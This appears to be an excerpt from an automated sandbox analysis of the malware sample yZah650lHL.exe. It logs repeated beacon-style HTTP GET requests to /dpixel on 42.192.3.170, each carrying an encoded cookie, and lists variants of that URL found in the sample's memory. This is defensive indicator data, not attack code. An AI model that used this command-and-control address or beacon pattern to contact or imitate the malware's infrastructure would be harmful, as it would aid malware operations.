          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: yZah650lHL.exe, 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:%u/
          Source: yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420843896.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/
          Source: yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/%
          Source: yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/)
          Source: yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/0
          Source: yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/9
          Source: yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/A
          Source: yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2078970685.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/F
          Source: yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/M
          Source: yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/Q
          Source: yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/S:
          Source: yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3191073968.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3211424591.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3094866758.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3271622558.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3113705174.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/b-53011b87bd06
          Source: yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/dpixel
          Source: yZah650lHL.exe, 00000000.00000003.2232239149.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/dpixel#X
          Source: yZah650lHL.exe, 00000000.00000003.2039804636.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/dpixel$X
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2306808221.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364539586.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2078970685.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://42.192.3.170/dpixel)
          Source: yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel)X
          Source: yZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel0
          Source: yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel1b87bd06
          Source: yZah650lHL.exe, 00000000.00000003.3328362680.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3031504097.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3071146501.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3051164954.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel1b87bd063
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel3$
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel7
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel8s
          Source: yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel9
          Source: yZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel;X
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1888943587.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, 
yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3094866758.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixel=#
          Source: yZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelBX
          Source: yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelGX
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3191073968.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelHG
